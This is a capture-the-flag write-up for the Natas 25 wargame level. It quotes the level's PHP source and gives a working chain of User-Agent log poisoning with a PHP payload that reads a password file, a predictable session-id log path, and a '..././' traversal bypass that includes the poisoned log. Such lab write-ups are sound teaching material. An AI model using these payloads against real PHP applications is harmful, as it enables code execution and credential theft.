function logRequest($message){ $log="[". date("d.m.Y H::i:s",time()) ."]"; $log=$log . " " . $_SERVER['HTTP_USER_AGENT']; $log=$log . " \"" . $message ."\"\n"; $fd=fopen("/tmp/natas25_" . session_id() .".log","a"); fwrite($fd,$log); fclose($fd); }logRequest function let us append arbitrary content to arbitrary file path. Why ?
1. We control $_SERVER['HTTP_USER_AGENT'] which is the value of the User-Agent HTTP header.
2. We control session_id() by PHPSESSID cookie value.
Let's set User-Agent to be the following:
<?php echo file_get_contents('/etc/natas_webpass/natas26') ?>and PHPSESSID value to be 'pwned'.
So, what we have done until now: if the logRequest function will be called, a PHP code that will print the next level password will be wrote to the file /tmp/natas25_pwned.log.
The last step is to display this code output. We can do it by including /tmp/natas25_pwned.log file content in the page by exploiting the following function which is called on page loading:
function setLanguage(){ /* language setup */ if(array_key_exists("lang",$_REQUEST)) if(safeinclude("language/" . $_REQUEST["lang"] )) return 1; safeinclude("language/en"); } function safeinclude($filename){ // check for directory traversal if(strstr($filename,"../")){ logRequest("Directory traversal attempt! fixing request."); $filename=str_replace("../","",$filename); } // dont let ppl steal our passwords if(strstr($filename,"natas_webpass")){ logRequest("Illegal file access detected! Aborting!"); exit(-1); } // add more checks... if (file_exists($filename)) { include($filename); return 1; } return 0; }
You can see that safeinclude function gives us hard life by removing '../'. To bypass it we will use the following distinction:
'..././' will become '../' after '../' will be removed. Therefore, we can use it to escape from the 'language/' directory and include arbitrary path (/tmp/natas25_pwned.log)
We will set lang GET parameter to be:
lang=..././..././..././..././..././tmp/natas25_pwned.log
It will trigger the logRequest function because there was a directory traversal attempt and the PHP code we saw earlier will be written to the included file.
Pwned ! :)